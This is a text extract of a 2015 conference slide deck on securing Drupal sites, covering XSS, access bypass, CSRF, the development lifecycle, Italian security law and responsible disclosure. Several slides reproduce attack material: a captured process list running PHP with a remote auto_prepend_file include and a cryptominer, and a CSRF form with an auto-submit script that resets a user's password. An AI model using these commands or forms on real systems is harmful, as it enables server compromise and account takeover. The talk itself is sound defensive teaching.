Secure Drupal, from start to finish

© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
Secure Drupal
From start to finish

Speaker Info
Boy Baukema
Security Specialist
boy@ibuildings.nl
@relaxnow

#DrupalDaysEU
• Security Specialist
• R&D Security
• Internal & External
• Security Training
• Consulting
• Security Audits
A Security what?

This is the Talk Title and it could be very long,
for example on two lines or more

#DrupalDaysEU
Gold Sponsors

#DrupalDaysEU
/usr/sbin/apache2
-‐k
start

_
/usr/sbin/apache2
-‐k
start

_
/usr/local/php539/bin/php-‐cgi

-‐dauto_prepend_file=http://XXX.XXX.XXX.XXX/
one.txt

-‐dallow_url_include=on

_
sh
-‐c
/tmp/sh.sh

_
./minerd

-‐a
scrypt

-‐o
stratum+tcp://multi.ghash.io:3333

-‐u
lscllc.worker16

-‐p
x
Such hacked. Much coins.

#DrupalDaysEU
[20:51:04]
root@bal-‐XXXX.prod:/var/log/nginx#

zgrep
"POST
/
HTTP/1.1"
access.log
|
egrep
-‐o

'forwarded_for="[^s,"]+?'
|
cut
-‐d'"'
-‐f2
|

sort
|
uniq
-‐c
|
sort
-‐nr
|
head
-‐30

2112
104.130.25.XXX

1144
37.221.162.XXX

1067
185.13.37.XXX

1066
77.247.181.XXX

1058
77.109.141.XXX

1047
5.135.158.XXX

1042
178.175.139.XXX
HTTP Flood

#DrupalDaysEU
• Drupal Top 3 
• Secure Development Lifecycle 
• The Law
The Plan

#DrupalDaysEU
// to expand it out into a comma-delimited set of placeholders.
foreach (array_filter($args, 'is_array') as $key => $data) {
$new_keys = array();
foreach ($data as $i => $value) {
// This assumes that there are no other placeholders that use the same
// name. For example, if the array placeholder is defined as :example
// and there is already an :example_2 placeholder, this will generate
/includes/database/database.inc

This is the Talk Title and it could be very long,
for example on two lines or more
Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/
201403/drupal-security-whitepaper-1-3.pdf

#DrupalDaysEU
/**
* Preprocess function to replace the regular label with the
* display label
*/
function field_display_label_preprocess_field(&$variables) {
$field = field_info_instance(...);
if (
isset($field['display_label']) &&
strlen(trim($field['display_label'])) > 0
) {
$variables['label'] = $field['display_label'];
1. XSS
From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?
id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67

#DrupalDaysEU
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content

#DrupalDaysEU
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content
Use t('@') syntax!
$text = t(
"@name's blog",
[ '@name' => format_username($account) ]
);

Filter Input
As early as possible

#DrupalDaysEU
$_GET, $_POST, $_REQUEST, $_COOKIE,
$_SERVER, $_FILES, $argv
everything from the database 
$form_state (mostly ['input'])
arg
drupal_get_query_parameters
drupal_current_script_url
drupal_detect_baseurl
request_path
What is input?

#DrupalDaysEU
Sanitize:
$id = (int) arg(1);
$accountEnabled = (bool) arg(1);
Validate: 
Form validators
in_array()
mb_strlen() > 1024
url_is_external
valid_url
Filter / Sanitize / Validate

Encode Output
As late as possible

#DrupalDaysEU
// This is to be accessible to all users,
// so 'access callback' can be set
// to TRUE, meaning that we should
// bypass all access checks.
'access callback' => TRUE,
2. Access Bypass

#DrupalDaysEU
global $user;
if ($user->uid = 1) {
watchdog('mymodule', request_uri());
}
A disturbance in the force

#DrupalDaysEU
• IDE / code sniffer (coder tools)
• if (1 = $uid)
• === instead of ==
• user_uid_optional_load($uid = NULL)
Avoiding accidental assign

#DrupalDaysEU
<form 
action="http://mysite.com/contact" 
method="post" 
/>
3. Cross Site Request Forgery

#DrupalDaysEU
<form 
action="https://www.drupal.org/user/2457520/edit" 
method="post"> 
<input type="hidden" 
name="pass[pass1]"  
value="hacked1"  
/>

#DrupalDaysEU
<script> 
$('#contactform').submit(); 
</script>

#DrupalDaysEU
=> drupal_get_token
<= drupal_valid_token
Drupal Forms to the rescue!

#DrupalDaysEU
• Authentication / Session
• Arbitrary Code Execution
• Denial of Service
• Information Disclosure
• Logic error
• Open Redirect
• Password Protection Bypass
• Session Fixation
• SQL Injection
• ....
4. Others

#DrupalDaysEU
1. Education & Guidance

#DrupalDaysEU
• Threat Assessment 
• Security Requirements 
2. Design time security

#DrupalDaysEU
• Architecture Review 
• Code Review
3. Security Review

#DrupalDaysEU
4. Security Testing
The OWASP Application Security
Veriﬁcation Standard (ASVS) Project
provides a basis for testing web
application technical security
controls.

#DrupalDaysEU
• Identify third party dependencies
• ... follow their Security Mailinglists
• Make rebuilding painless.
• Make redeploying painless.
• Backup & restore from backup 'regularly'
5. Vulnerability Management

The Law

#DrupalDaysEU
the penalty for failure to adopt the minimum measures is
that of Article 169 of the Code  
(imprisonment up to two years);
damages -the manager has the burden of proof that he
took all that was possible to avoid the damage, referring to
appropriate practice known techniques of computer
security , while the victim must only prove the existence of
damage.
Misure minime di sicurezza

#DrupalDaysEU
• Individually associated accounts
• > 8 character passwords
• Changed every 3 to 6 months
• Do not leave admin unattended
• Privileges on need to know basis
• Verify privileges at least yearly
• Update at least every 6 months
• Backup data at least weekly
Disciplinare tecnico

#DrupalDaysEU
Gold Sponsors
Bob's Story

#DrupalDaysEU
Responsible
Disclosure

#DrupalDaysEU
• Know your law
• Think like an attacker
• ... but don't become one (without permission)
• Make sure white hats have a place to go
• Filter Input, Encode Output
• Train your developers
• Design with security in mind
• Review and be critical
• Trust but verify that you are secure
• Perform active automated maintenance
In summary

#DrupalDaysEU
• http://www.slideshare.net/relaxnow/drupaldays-2015
• http://crackingdrupal.com
• http://drupalsecurityreport.com
• http://drupal.org/writing-secure-code
• http://owasp.org
• OWASP ASVS
The End

Secure Drupal, from start to finish

More Related Content

Similar to Secure Drupal, from start to finish (20)

More from Boy Baukema (12)

Recently uploaded (20)

Secure Drupal, from start to finish